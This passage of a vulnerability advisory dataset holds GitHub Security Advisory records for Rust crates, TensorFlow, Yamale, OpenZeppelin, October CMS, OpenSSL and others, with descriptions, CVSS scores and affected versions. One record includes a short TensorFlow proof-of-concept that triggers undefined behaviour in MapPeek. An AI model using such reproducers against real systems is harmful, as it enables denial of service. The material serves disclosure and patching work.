'crates.io', 'name': 'ckb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.40.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nervosnetwork/ckb/security/advisories/GHSA-v666-6w97-pcwm'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0107.html'}]","{'cwe_ids': ['CWE-367'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T21:55:20Z', 'nvd_published_at': None}" +1.4.0,GHSA-m296-j53x-xv95,2023-06-13T21:47:59Z,2021-08-25T21:00:32Z,,[],Data races in tiny_future,"`tiny_future` contains a light-weight implementation of `Future`s. The `Future` type it has lacked bound on its `Send` and `Sync` traits. This allows for a bug where non-thread safe types such as `Cell` can be used in `Future`s and cause data races in concurrent programs. The flaw was corrected in commit `c791919` by adding trait bounds to `Future`'s `Send` and `Sync`. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'tiny_future'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/KizzyCode/tiny_future/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/KizzyCode/tiny_future/commit/7ab8a264980d23c2ed64e72f4636f38b7381eb39'}, {'type': 'WEB', 'url': 'https://github.com/KizzyCode/tiny_future/commit/c7919199a0f6d1ce0e3c33499d1b37f862c990e4'}, {'type': 'PACKAGE', 'url': 'https://github.com/KizzyCode/tiny_future'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0118.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-05T22:01:31Z', 'nvd_published_at': None}" +1.4.0,GHSA-435p-f82x-mxwm,2021-08-26T15:21:24Z,2021-08-11T15:19:23Z,,['CVE-2021-38305'],Command injection in Yamale,"23andMe Yamale before 3.0.8 allows remote attackers to execute arbitrary code via a crafted schema file. The schema parser uses eval as part of its processing, and tries to protect from malicious expressions by limiting the builtins that are passed to the eval. When processing the schema, each line is run through Python's eval function to make the validator available. A well-constructed string within the schema rules can execute system commands; thus, by exploiting the vulnerability, an attacker can run arbitrary code on the image that invokes Yamale.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'yamale'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38305'}, {'type': 'WEB', 'url': 'https://github.com/23andMe/Yamale/pull/165'}, {'type': 'PACKAGE', 'url': 'https://github.com/23andMe/Yamale'}, {'type': 'WEB', 'url': 'https://github.com/23andMe/Yamale/releases/tag/3.0.8'}]","{'cwe_ids': ['CWE-434', 'CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-10T17:33:14Z', 'nvd_published_at': '2021-08-09T21:15:00Z'}" +1.4.0,GHSA-hv7x-f3pv-gpwr,2023-06-13T20:55:22Z,2021-08-25T20:44:46Z,,['CVE-2019-16137'],Wrong memory orderings violates mutual exclusion in spin,"Wrong memory orderings inside the RwLock implementation allow for two writers to acquire the lock at the same time. The drop implementation used Ordering::Relaxed, which allows the compiler or CPU to reorder a mutable access on the locked data after the lock has been yielded. + +Only users of the RwLock implementation are affected. Users of Once (including users of lazy_static with the spin_no_std feature enabled) are NOT affected. + +On strongly ordered CPU architectures like x86, the only real way that this would lead to a memory corruption is if the compiler reorders an access after the lock is yielded, which is possible but in practice unlikely. It is a more serious issue on weakly ordered architectures such as ARM which, except in the presence of certain instructions, allow the hardware to decide which accesses are seen at what times. Therefore on an ARM system it is likely that using the wrong memory ordering would result in a memory corruption, even if the compiler itself doesn't reorder the memory accesses in a buggy way.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'spin'}, 'ecosystem_specific': {'affected_functions': ['spin::RwLock::new']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16137'}, {'type': 'WEB', 'url': 'https://github.com/mvdnes/spin-rs/issues/65'}, {'type': 'WEB', 'url': 'https://github.com/mvdnes/spin-rs/pull/66'}, {'type': 'PACKAGE', 'url': 'https://github.com/mvdnes/spin-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0013.html'}]","{'cwe_ids': ['CWE-662'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:22:40Z', 'nvd_published_at': None}" +1.4.0,GHSA-qr82-2c78-4m8h,2021-08-24T14:33:00Z,2021-08-25T14:41:42Z,,['CVE-2021-37671'],Reference binding to nullptr in map operations,"### Impact +An attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.Map*` and `tf.raw_ops.OrderedMap*` operations: + +```python +import tensorflow as tf + +tf.raw_ops.MapPeek( + key=tf.constant([8],dtype=tf.int64), + indices=[], + dtypes=[tf.int32], + capacity=8, + memory_limit=128) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/map_stage_op.cc#L222-L248) has a check in place to ensure that `indices` is in ascending order, but does not check that `indices` is not empty. + +### Patches +We have patched the issue in GitHub commit [532f5c5a547126c634fefd43bbad1dc6417678ac](https://github.com/tensorflow/tensorflow/commit/532f5c5a547126c634fefd43bbad1dc6417678ac). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-qr82-2c78-4m8h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37671'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/532f5c5a547126c634fefd43bbad1dc6417678ac'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T14:33:00Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}" +1.4.0,GHSA-7cqg-8449-rmfv,2021-07-27T15:21:02Z,2021-08-25T21:01:27Z,,['CVE-2019-20399'],Observable Discrepancy in libsecp256k1-rs,A timing vulnerability in the Scalar::check_overflow function in Parity libsecp256k1-rs before 0.3.1 potentially allows an attacker to leak information via a side-channel attack.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'libsecp256k1-rs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-20399'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/libsecp256k1/commit/11ba23a9766a5079918cd9f515bc100bc8164b50'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0156.html'}]","{'cwe_ids': ['CWE-203', 'CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T15:21:02Z', 'nvd_published_at': '2020-01-23T00:15:00Z'}" +1.4.0,GHSA-qg24-8xj4-gj2h,2021-08-18T20:17:28Z,2021-08-25T20:58:13Z,,['CVE-2020-36433'],Unaligned memory allocation in chunky,An issue was discovered in the chunky crate through 2020-08-25 for Rust. The Chunk API does not honor an alignment requirement.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'chunky'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36433'}, {'type': 'WEB', 'url': 'https://github.com/aeplay/chunky/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/aeplay/chunky'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0035.html'}]","{'cwe_ids': ['CWE-758'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:17:28Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-vjrq-cg9x-rfjp,2023-06-13T17:03:43Z,2021-08-25T20:43:02Z,,['CVE-2017-18589'],Improper Input Validation in cookie,"Affected versions of this crate use the time crate and the method Duration::seconds to parse the Max-Age duration cookie setting. This method will panic if the value is greater than 2^64/1000 and less than or equal to 2^64, which can result in denial of service for a client or server. + +This flaw was corrected by explicitly checking for the Max-Age being in this integer range and clamping the value to the maximum duration value.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'cookie'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-18589'}, {'type': 'WEB', 'url': 'https://github.com/SergioBenitez/cookie-rs/pull/86'}, {'type': 'WEB', 'url': 'https://github.com/SergioBenitez/cookie-rs/commit/ee18b79fbf0903b73da525d302b09448009e0050'}, {'type': 'PACKAGE', 'url': 'https://github.com/alexcrichton/cookie-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2017-0005.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:25:22Z', 'nvd_published_at': None}" +1.4.0,GHSA-fg47-3c2x-m2wr,2021-09-13T20:30:10Z,2021-08-30T16:12:38Z,,['CVE-2021-39167'],TimelockController vulnerability in OpenZeppelin Contracts ,"### Impact + +A vulnerability in `TimelockController` allowed an actor with the executor role to take immediate control of the timelock, by resetting the delay to 0 and escalating privileges, thus gaining unrestricted access to assets held in the contract. Instances with the executor role set to ""open"" allow anyone to use the executor role, thus leaving the timelock at risk of being taken over by an attacker. + +### Patches + +A fix is included in the following releases of `@openzeppelin/contracts` and `@openzeppelin/contracts-upgradeable`: +- 4.3.1 +- 3.4.2 +- 3.4.2-solc-0.7 + +Deployed instances of `TimelockController` should be replaced with a fixed version by migrating all assets, ownership, and roles. + +### Workarounds + +Revoke the executor role from accounts not strictly under the team's control. We recommend revoking all executors that are not also proposers. When applying this mitigation, ensure there is at least one proposer and executor remaining. + +### References + +[Post-mortem](https://forum.openzeppelin.com/t/timelockcontroller-vulnerability-postmortem/14958). + +### Credits + +The issue was identified by an anonymous white hat hacker through [Immunefi](https://immunefi.com/). + +### For more information + +If you have any questions or comments about this advisory, or need assistance executing the mitigation, email us at security@openzeppelin.com. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.3.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.0'}, {'fixed': '3.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-fg47-3c2x-m2wr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39167'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/commit/cec4f2ef57495d8b1742d62846da212515d99dd5'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/CHANGELOG.md#431'}]","{'cwe_ids': ['CWE-269'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-27T12:59:07Z', 'nvd_published_at': '2021-08-27T00:15:00Z'}" +1.4.0,GHSA-5325-xw5m-phm3,2021-08-18T21:28:38Z,2021-08-25T20:55:56Z,,['CVE-2021-38193'],Cross-site Scripting in ammonia,"An issue was discovered in the ammonia crate before 3.1.0 for Rust. XSS can occur because the parsing differences for HTML, SVG, and MathML are mishandled, a similar issue to CVE-2020-26870.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ammonia'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.1.0'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'ammonia'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38193'}, {'type': 'WEB', 'url': 'https://github.com/rust-ammonia/ammonia/pull/142'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-ammonia/ammonia'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/ammonia/RUSTSEC-2021-0074.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0074.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:28:38Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-mp6r-fgw2-rxfx,2023-06-13T22:28:51Z,2021-08-25T20:53:27Z,,['CVE-2021-26956'],Arbitrary return types in xcb,"The function xcb::xproto::GetPropertyReply::value() returns a slice of type T where T is an unconstrained type parameter. The raw bytes received from the X11 server are interpreted as the requested type. The users of the xcb crate are advised to only call this function with the intended types. These are u8, u16, and u32. + +This issue is tracked here: https://github.com/rust-x-bindings/rust-xcb/issues/95","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'xcb'}, 'ecosystem_specific': {'affected_functions': ['xcb::xproto::GetPropertyReply::value']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26956'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/issues/653'}, {'type': 'WEB', 'url': 'https://github.com/rust-x-bindings/rust-xcb/issues/95'}, {'type': 'PACKAGE', 'url': 'https://github.com/rtbo/rust-xcb'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0019.html'}]","{'cwe_ids': ['CWE-657'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:35:46Z', 'nvd_published_at': None}" +1.4.0,GHSA-gffv-5hr2-f9gj,2023-06-13T20:12:57Z,2021-08-25T20:43:18Z,,['CVE-2018-20999'],Flaw in streaming state in orion,"Affected versions of this crate did not properly reset a streaming state. Resetting a streaming state, without finalising it first, creates incorrect results. The flaw was corrected by not first checking if the state had already been reset, when calling reset().","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'orion'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.11.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20999'}, {'type': 'WEB', 'url': 'https://github.com/brycx/orion/issues/46'}, {'type': 'PACKAGE', 'url': 'https://github.com/brycx/orion'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0012.html'}]","{'cwe_ids': ['CWE-682'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:37Z', 'nvd_published_at': None}" +1.4.0,GHSA-jq65-29v4-4x35,2021-08-19T21:21:21Z,2021-08-25T20:45:15Z,,['CVE-2020-1967'],Null pointer deference in openssl-src ,"Server or client applications that call the SSL_check_chain() function during or after a TLS 1.3 handshake may crash due to a NULL pointer dereference as a result of incorrect handling of the ""signature_algorithms_cert"" TLS extension. The crash occurs if an invalid or unrecognised signature algorithm is received from the peer. This could be exploited by a malicious peer in a Denial of Service attack. OpenSSL version 1.1.1d, 1.1.1e, and 1.1.1f are affected by this issue. This issue did not affect OpenSSL versions prior to 1.1.1d. Fixed in OpenSSL 1.1.1g (Affected 1.1.1d-1.1.1f).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '111.6.0'}, {'fixed': '111.9.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1967'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=eb563247aef3e83dda7679c43f9649270462e5b1'}, {'type': 'WEB', 'url': 'https://github.com/irsl/CVE-2020-1967'}, {'type': 'WEB', 'url': 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44440'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r66ea9c436da150683432db5fbc8beb8ae01886c6459ac30c2cea7345@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r94d6ac3f010a38fccf4f432b12180a13fa1cf303559bd805648c9064@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9a41e304992ce6aec6585a87842b4f2e692604f5c892c37e3b0587ee@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DDHOAATPWJCXRNFMJ2SASDBBNU5RJONY/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EXDDAOWSAIEFQNBHWYE6PPYFV4QXGMCD/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XVEP3LAK4JSPRXFO4QF4GG2IVXADV3SO/'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0015.html'}, {'type': 'WEB', 'url': 'https://security.FreeBSD.org/advisories/FreeBSD-SA-20:11.openssl.asc'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202004-10'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200424-0003/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200717-0004/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4661'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20200421.txt'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://www.synology.com/security/advisory/Synology_SA_20_05'}, {'type': 'WEB', 'url': 'https://www.synology.com/security/advisory/Synology_SA_20_05_OpenSSL'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2020-03'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2020-04'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2020-11'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-10'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00004.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00011.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/157527/OpenSSL-signature_algorithms_cert-Denial-Of-Service.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2020/May/5'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/04/22/2'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:21:21Z', 'nvd_published_at': '2020-04-21T14:15:00Z'}" +1.4.0,GHSA-h76r-vgf3-j6w5,2022-08-11T00:18:28Z,2021-08-30T16:13:50Z,,['CVE-2021-29487'],October CMS auth bypass and account takeover,"### Impact + +An attacker can exploit this vulnerability to bypass authentication using a specially crafted persist cookie. + +- To exploit this vulnerability, an attacker must obtain a Laravel’s secret key for cookie encryption and signing. +- Due to the logic of how this mechanism works, a targeted user account must be logged in while +the attacker is exploiting the vulnerability. +- Authorization via persist cookie not shown in access logs. + +### Patches + +- Issue has been patched in Build 472 and v1.1.5 +- [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) + +### Workarounds + +Apply https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374 and https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9 to your installation manually if you are unable to upgrade. + +[**Update 2022-01-20**] [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) can be found here. + +### Recommendations + +We recommend the following steps to make sure your server stays secure: + +- Keep server OS and system software up to date. +- Keep October CMS software up to date. +- Use a multi-factor authentication plugin. +- Change the [default backend URL](https://github.com/octobercms/october/blob/1.1/config/cms.php#L39) or block public access to the backend area. +- Include the [Roave/SecurityAdvisories](https://github.com/Roave/SecurityAdvisories) Composer package to ensure that your application doesn't have installed dependencies with known security vulnerabilities. + +### References + +Bugs found as part of Solar Security CMS Research. Credits to: +• Andrey Basarygin +• Andrey Guzei +• Mikhail Khramenkov +• Alexander Sidukov +• Maxim Teplykh + +### For more information +If you have any questions or comments about this advisory: +* Email us at [hello@octobercms.com](mailto:hello@octobercms.com) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'october/system'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.472'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'october/system'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.1'}, {'fixed': '1.1.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-h76r-vgf3-j6w5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29487'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9'}, {'type': 'PACKAGE', 'url': 'https://github.com/octobercms/october'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T20:09:50Z', 'nvd_published_at': '2021-08-26T19:15:00Z'}" +1.4.0,GHSA-h5q8-5697-9p9h,2021-08-30T17:02:20Z,2021-08-30T17:22:15Z,,['CVE-2020-22403'],Cross-Site Request Forgery in express-cart,The express-cart package through 1.1.10 for Node.js allows CSRF.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'express-cart'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-22403'}, {'type': 'WEB', 'url': 'https://github.com/mrvautin/expressCart/issues/120'}, {'type': 'WEB', 'url': 'https://github.com/mrvautin/expressCart/commit/cd3ba1bc609c2f2946bfbc7ee2fccf3483eb71fb'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/395944'}, {'type': 'PACKAGE', 'url': 'https://github.com/mrvautin/expressCart'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210909-0004/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/express-cart'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T17:02:20Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}" +1.4.0,GHSA-q7f7-544h-67h9,2021-08-24T17:13:21Z,2021-08-25T14:40:13Z,,['CVE-2021-37684'],FPE in TFLite pooling operations,"### Impact +The implementations of pooling in TFLite are vulnerable to division by 0 errors as there are no checks for divisors not being 0. + +### Patches +We have patched the issue in GitHub commit [dfa22b348b70bb89d6d6ec0ff53973bacb4f4695](https://github.com/tensorflow/tensorflow/commit/dfa22b348b70bb89d6d6ec0ff53973bacb4f4695). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 